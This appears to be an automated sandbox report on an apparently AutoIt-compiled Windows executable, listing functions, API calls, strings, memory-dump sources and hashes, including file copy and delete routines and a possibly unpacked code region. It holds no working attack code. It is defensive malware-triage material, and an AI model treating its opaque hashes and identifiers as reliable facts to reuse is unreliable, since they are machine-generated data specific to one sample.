Instruction Fuzzy Hash: E7115EB5640704BFD7218B65EC48F677BBAFBC5B21F204268F505C62A0DB61E805A660

Function 00F6445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00F3E398), ref: 00F6446A
FindFirstFileW.KERNELBASE(?,?), ref: 00F6447B
FindClose.KERNEL32(00000000), ref: 00F6448B

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: c66466595e210e62346492bf4dda107b962ad1397df267cf70cf09d86fc11a7e
Instruction ID: ca14312a5b7f04936878acb32ffb6ee8f12d057a252a96e982d03f62d59364fd
Opcode Fuzzy Hash: c66466595e210e62346492bf4dda107b962ad1397df267cf70cf09d86fc11a7e
Instruction Fuzzy Hash: EAE0D8338105046F4610BB38EC0E4F9775C9E45335F100715FC35C10D0EB74A904B695

Function 00F109D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F10A5B
timeGetTime.WINMM ref: 00F10D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F10E53
Sleep.KERNEL32(0000000A), ref: 00F10E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00F10EFA
DestroyWindow.USER32 ref: 00F10F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F10F20
Sleep.KERNEL32(0000000A,?,?), ref: 00F44E83
TranslateMessage.USER32(?), ref: 00F45C60
DispatchMessageW.USER32(?), ref: 00F45C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F45C82

Strings

@TRAY_ID, xrefs: 00F4578F
@COM_EVENTOBJ, xrefs: 00F454F0
@GUI_CTRLHANDLE, xrefs: 00F44FE4
@GUI_WINHANDLE, xrefs: 00F44F8F
@GUI_CTRLID, xrefs: 00F44F3A

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: b8b9259fc315c80df8291ca90392b1bbd35132312c493109d8b54ba9796e16c9
Instruction ID: 554c9da6c79577dcf129df462b2f0e5e2ac3e52278fe5fa88c4cdbb5b2196e62
Opcode Fuzzy Hash: b8b9259fc315c80df8291ca90392b1bbd35132312c493109d8b54ba9796e16c9
Instruction Fuzzy Hash: F9B2E671608741DFD724DF24C885BAABBE0BF84714F14491DF949972A2DBB4E884FB82

Function 00F69155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F68F5F: __time64.LIBCMT ref: 00F68F69

Part of subcall function 00F04EE5: _fseek.LIBCMT ref: 00F04EFD

__wsplitpath.LIBCMT ref: 00F69234

Part of subcall function 00F240FB: __wsplitpath_helper.LIBCMT ref: 00F2413B

_wcscpy.LIBCMT ref: 00F69247
_wcscat.LIBCMT ref: 00F6925A
__wsplitpath.LIBCMT ref: 00F6927F
_wcscat.LIBCMT ref: 00F69295
_wcscat.LIBCMT ref: 00F692A8

Part of subcall function 00F68FA5: _memmove.LIBCMT ref: 00F68FDE
Part of subcall function 00F68FA5: _memmove.LIBCMT ref: 00F68FED

_wcscmp.LIBCMT ref: 00F691EF

Part of subcall function 00F69734: _wcscmp.LIBCMT ref: 00F69824
Part of subcall function 00F69734: _wcscmp.LIBCMT ref: 00F69837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F69452
_wcsncpy.LIBCMT ref: 00F694C5
DeleteFileW.KERNEL32(?,?), ref: 00F694FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F69511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F69522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F69534

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 1d7b4c890db9b7d0cb54284c59786b162a936361a437e39e36cee25b653249ae
Instruction ID: 2942b540d3191710ec39dbb40ecd3f61bb96fb29f4630176e92cf62aba6469d7
Opcode Fuzzy Hash: 1d7b4c890db9b7d0cb54284c59786b162a936361a437e39e36cee25b653249ae
Instruction Fuzzy Hash: AFC15EB1D04229ABDF11DF95CC81ADEB7BDEF45310F0040AAF609E7141DB74AA85AF61

Function 00F03015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00F03074
RegisterClassExW.USER32(00000030), ref: 00F0309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F030AF
InitCommonControlsEx.COMCTL32(?), ref: 00F030CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F030DC
LoadIconW.USER32(000000A9), ref: 00F030F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F03101

Strings

0, xrefs: 00F03056
+, xrefs: 00F0305D
AutoIt v3 GUI, xrefs: 00F03090
TaskbarCreated, xrefs: 00F030A4

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 417b5688d97b8caa341e2dc40f517b440361035b31372e9ccbdd094b50dc3b34
Instruction ID: 3f5ea7ddc815fa35c4fa6e283fbc4e99e8677980917e156dc9f6a667342f72d5
Opcode Fuzzy Hash: 417b5688d97b8caa341e2dc40f517b440361035b31372e9ccbdd094b50dc3b34
Instruction Fuzzy Hash: C93156B1840309AFEB00CFA4EC89ADDBBF0FB09710F24452EE580E62A0D7B51589EF51

Function 00F03041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00F03074
RegisterClassExW.USER32(00000030), ref: 00F0309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F030AF
InitCommonControlsEx.COMCTL32(?), ref: 00F030CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F030DC
LoadIconW.USER32(000000A9), ref: 00F030F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F03101

Strings

0, xrefs: 00F03056
+, xrefs: 00F0305D
AutoIt v3 GUI, xrefs: 00F03090
TaskbarCreated, xrefs: 00F030A4

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 21806ef964e7886c40c3e1c109d2c12b4a6850f91270222d4b64d7d64ccdb254
Instruction ID: f748a6c79b143abd3fa29584fef34d214dae7407b2e83966fc659954cb209753
Opcode Fuzzy Hash: 21806ef964e7886c40c3e1c109d2c12b4a6850f91270222d4b64d7d64ccdb254
Instruction Fuzzy Hash: 2121B4B1D1121CAFEB00DFA4ED49ADDBBF4FB08B10F10412AF511A72A0D7B15588AF91

Function 00F0708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F04706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FC52F8,?,00F037AE,?), ref: 00F04724

Part of subcall function 00F2050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00F07165), ref: 00F2052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F071A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F3E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F3E909
RegCloseKey.ADVAPI32(?), ref: 00F3E947
_wcscat.LIBCMT ref: 00F3E9A0

Strings

Include, xrefs: 00F3E8BF, 00F3E900
Software\AutoIt v3\AutoIt, xrefs: 00F0719E
\, xrefs: 00F3E9C3
\Include\, xrefs: 00F07165

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 113050b28d67c4cbd42f67f889a9d8c1ffa5cd96caf282d1223d8dc6f61f6355
Instruction ID: e22e3033adc5d23dc64df56d0a23381cadd3b215658bb3f2d59774e72525ded1
Opcode Fuzzy Hash: 113050b28d67c4cbd42f67f889a9d8c1ffa5cd96caf282d1223d8dc6f61f6355
Instruction Fuzzy Hash: 09714C719093059ECB04EF25ED42DABBBA8FF84360F40452EF445C72A1DB75A948FB52

Function 00F03A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00F03A50
LoadCursorW.USER32(00000000,00007F00), ref: 00F03A5F
LoadIconW.USER32(00000063), ref: 00F03A76
LoadIconW.USER32(000000A4), ref: 00F03A88
LoadIconW.USER32(000000A2), ref: 00F03A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F03AC0
RegisterClassExW.USER32(?), ref: 00F03B16

Part of subcall function 00F03041: GetSysColorBrush.USER32(0000000F), ref: 00F03074
Part of subcall function 00F03041: RegisterClassExW.USER32(00000030), ref: 00F0309E
Part of subcall function 00F03041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F030AF
Part of subcall function 00F03041: InitCommonControlsEx.COMCTL32(?), ref: 00F030CC
Part of subcall function 00F03041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F030DC
Part of subcall function 00F03041: LoadIconW.USER32(000000A9), ref: 00F030F2
Part of subcall function 00F03041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F03101

Strings

AutoIt v3, xrefs: 00F03B05
#, xrefs: 00F03AFB
0, xrefs: 00F03AF4

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 3e91cbc6428e63e7f6c5bf414b5d593cc1774e9552402ab1d037a1178782d704
Instruction ID: 531598c3abeeb069e3439797b14b3ec9fa8f4cb1b2abeed93587265db73ff5a4
Opcode Fuzzy Hash: 3e91cbc6428e63e7f6c5bf414b5d593cc1774e9552402ab1d037a1178782d704
Instruction Fuzzy Hash: C2211CB1D00308AFEB10DFA4EE4AFDD7BF4EB08B15F100119E504A72A1D3B56594AF94

Function 00F03633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00F036D2
KillTimer.USER32(?,00000001), ref: 00F036FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F0371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F0372A
CreatePopupMenu.USER32 ref: 00F0373E
PostQuitMessage.USER32(00000000), ref: 00F0374D

Strings

TaskbarCreated, xrefs: 00F03725

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 10211b055f75724458e8f14ad6c61e0e3c92f92cd82c145b0ab0e1da6a833627
Instruction ID: 387f2ebdbc4a9f8c1d52b01497c35aa1964dcd4f794efcfb0e06d1530dc3bc29
Opcode Fuzzy Hash: 10211b055f75724458e8f14ad6c61e0e3c92f92cd82c145b0ab0e1da6a833627
Instruction Fuzzy Hash: C8415DB390450DBBDB145F68ED0AFBD379DEB04721F500125F602D72E2CA66AD84B761

Function 00F03766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/ErrorStdOut, xrefs: 00F0387D
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00F037AE
/AutoIt3OutputDebug, xrefs: 00F03892
CMDLINERAW, xrefs: 00F037FB
/AutoIt3ExecuteScript, xrefs: 00F038BC
CMDLINE, xrefs: 00F03822
/AutoIt3ExecuteLine, xrefs: 00F038A7

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 690187d1bc1b6e6e23ba5d4c7ed24b371c0374e3d07911cfc52f0ca6b6649096
Instruction ID: 1184813ff4ab2538fb01343121c1b3ddd35e902c08831e1316ebec6718ffd5e3
Opcode Fuzzy Hash: 690187d1bc1b6e6e23ba5d4c7ed24b371c0374e3d07911cfc52f0ca6b6649096
Instruction Fuzzy Hash: 1FA14D7291422D9ACB04EBA0DC51EEEB7B9BF14710F440529F415A71D2EF78AA08FB60

Function 01947F98 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01948069
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0194828F

Memory Dump Source

Source File: 00000000.00000002.2111882744.0000000001945000.00000040.00000020.00020000.00000000.sdmp, Offset: 01945000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1945000_EIvidclKOb.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction ID: 4116b42c8388b20855c2a474dfa8a1ba4f9b6f712318ce12be452803c18e9238
Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction Fuzzy Hash: 79A10774E00209EBDB14CFE4C898FEEBBB5BF48705F208559E615BB281D7759A81CB50

Function 00F039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F03A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F03A24
ShowWindow.USER32(00000000,?,?), ref: 00F03A38
ShowWindow.USER32(00000000,?,?), ref: 00F03A41

Strings

AutoIt v3, xrefs: 00F039FB, 00F03A00, 00F03A01
edit, xrefs: 00F03A1E

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 70947a76fe6d76015a330c59b43c1b23d1892c2d8929021259633878bad810a8
Instruction ID: 6fb12ae3b9880badcbeb779eace3f582255d0259b2d9816d06ed3c16bf5f1fdb
Opcode Fuzzy Hash: 70947a76fe6d76015a330c59b43c1b23d1892c2d8929021259633878bad810a8
Instruction Fuzzy Hash: 5CF03A705002987EEB305763AC4AEBB3EBDD7C7F50B00002AB900E3170C2752881EAB0

Function 01947D48 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01947C38: Sleep.KERNELBASE(000001F4), ref: 01947C49

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01947E8B

Strings

AYJ4STE49CUTSZTHP11L, xrefs: 01947EEE, 01947EF1

Memory Dump Source

Source File: 00000000.00000002.2111882744.0000000001945000.00000040.00000020.00020000.00000000.sdmp, Offset: 01945000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1945000_EIvidclKOb.jbxd

Similarity

API ID: CreateFileSleep
String ID: AYJ4STE49CUTSZTHP11L
API String ID: 2694422964-2562011091
Opcode ID: 8b4005d496e3c1c29a6f59ec18aee6d84191347f1d93826eae0b22bac2131ac8
Instruction ID: 26888b1923119a97cbf83c7d8616084aa57a33db43f3ecc37a39db8a6a7f8ab7
Opcode Fuzzy Hash: 8b4005d496e3c1c29a6f59ec18aee6d84191347f1d93826eae0b22bac2131ac8
Instruction Fuzzy Hash: F0515D30D04248EBEF15DBE4C854BEEBB79AF59301F004599E248BB2C1D7B91B49CBA5

Function 00F0407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F3D3D7

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

_memset.LIBCMT ref: 00F040FC
_wcscpy.LIBCMT ref: 00F04150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F04160

Strings

Line: , xrefs: 00F3D400

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 11d29b87fd2c89bee616370567759dab450c9c91d8e9e8f1111692c2fc76bf1c
Instruction ID: bdd35a760a4f6a5367dd3291a817ba16ecfd74a70fb0f671bcbad50305a0b748
Opcode Fuzzy Hash: 11d29b87fd2c89bee616370567759dab450c9c91d8e9e8f1111692c2fc76bf1c
Instruction Fuzzy Hash: 6531B2B2408305AED721EB60EC46FDB77D8AF84714F10451AF685930D1EB74B648F792

Function 00F0686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F04DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00FC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F04E0F

_free.LIBCMT ref: 00F3E263
_free.LIBCMT ref: 00F3E2AA

Part of subcall function 00F06A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F06BAD

Strings

Bad directive syntax error, xrefs: 00F3E292
>>>AUTOIT SCRIPT<<<, xrefs: 00F3E039

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 24cd2f37dd280902938cc95c6d39e1ae7d21db3b8534b03ed029012a217b9406
Instruction ID: 47b7c65a64cb9e5c672be8fbd54e7a0fcfa339971d116b81297d49f4df54a0ba
Opcode Fuzzy Hash: 24cd2f37dd280902938cc95c6d39e1ae7d21db3b8534b03ed029012a217b9406
Instruction Fuzzy Hash: 1D915C71D04219AFCF04EFA4CC919EEB7B8FF14320F14446AE815AB2E1DB78A955EB50

Function 00F035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00F035A1,SwapMouseButtons,00000004,?), ref: 00F035D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00F035A1,SwapMouseButtons,00000004,?,?,?,?,00F02754), ref: 00F035F5
RegCloseKey.KERNELBASE(00000000,?,?,00F035A1,SwapMouseButtons,00000004,?,?,?,?,00F02754), ref: 00F03617

Strings

Control Panel\Mouse, xrefs: 00F035D2

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
